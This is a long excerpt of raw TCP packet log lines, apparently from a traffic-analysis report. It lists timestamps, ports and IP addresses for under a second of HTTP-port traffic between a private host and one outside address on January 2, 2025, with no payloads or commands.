                                                                            Jan 2, 2025 20:34:50.046822071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046830893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046835899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046837091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046845913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046871901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046875954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046905041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046905994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046916008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046926975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046948910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046957016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046967030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046978951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046993017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047003984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047009945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047017097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047049999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047075987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047090054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047101021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047111988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047121048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047122955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047149897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047174931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047190905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047235012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047288895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047301054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047326088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047334909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047336102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047348976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047364950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047367096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047377110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047384977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047388077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047399044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047410011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047415972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047447920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047482014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047501087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047511101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047522068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047533035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.047535896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047565937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.047593117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.048604965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048619032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048630953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048640966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048651934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048661947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048672915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.048672915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048685074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.048712969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.048737049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.050523043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050534964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050551891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050566912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050584078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050590038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.050595045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050605059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050612926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.050616980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050626993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.050636053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.050664902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.057737112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057751894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057763100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057774067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057785034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057795048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057811975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.057812929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057823896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.057845116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.057873964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.060013056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060025930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060036898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060081959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060091972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060103893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060115099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.060127020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.062114000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.064661980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064675093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064687014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064697981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064708948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064721107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064727068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.064732075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064743996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.064750910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.064774036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.067692995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067704916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067723036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067734003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067743063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067755938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067760944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.067768097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067778111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067784071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.067790031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.067814112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.067832947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132626057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132643938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132664919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132678032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132688999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132689953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132699966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132721901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132725954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132745981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132755041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132765055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132772923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132776022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132785082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132790089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132795095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132806063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132817030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132827997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132833958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132838011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132849932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132863998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132886887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132889032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132927895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132930994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132940054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132967949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132967949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132977962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.132983923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.132989883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133008003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133018970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133028984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133033991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133038998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133061886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133064032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133084059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133090973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133133888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133136034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133147001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133157969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133167982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133177042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133212090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133213043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133232117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133246899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133253098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133256912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133276939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133301973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133336067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133354902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133367062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133377075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133377075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133388996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133409977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133440971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133483887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133523941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133524895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133534908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133569002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133601904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133613110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133622885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133632898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133645058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133646011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133656025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133666992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133683920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133690119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133696079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133723021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133730888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133742094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133750916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133768082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133790016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133820057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133832932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133843899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133858919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133862019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133877993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133882046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133889914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133902073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.133924007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.133944035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134043932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134054899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134064913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134076118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134087086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134090900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134099007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134109974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134116888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134140968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134154081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134162903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134165049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134176016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134195089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134196997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134207964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134216070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134226084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134238005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134248972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134248972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134258986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.134274960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.134298086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.135401011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135412931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135430098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135440111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135451078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.135451078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135478020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.135478973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135498047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135505915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.135508060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.135541916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.137448072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137459993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137478113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137489080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137495995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.137501001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137511969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137516975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.137523890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.137550116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.137569904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.144536972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144556999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144572020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144582987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144593954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144604921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144618034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.144622087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.144680023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.146771908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146785021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146796942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146807909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146825075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146827936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.146835089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146847010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146852016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.146857977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.146888971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.146907091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.154330969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.154412031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.317262888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.322118998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703460932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703480005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703490973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703531027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.703579903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.703707933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703739882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703747988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.703749895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703762054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703773975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.703774929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.703814983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.703824997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.704530954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704544067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704554081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704586029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.704617977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.704715014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704726934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704739094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.704756021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.704782963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.706078053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.706089020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.706106901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.706134081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.706171036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.706965923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.706976891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.706988096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.707017899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.707056999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.707112074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.707139969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.707149029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.707154989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.707175970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.707192898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.708606958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.708616972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.708628893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.708643913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.708664894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.708683968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.709316969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.709327936 CET804973047.254.187.72192.168.2.4
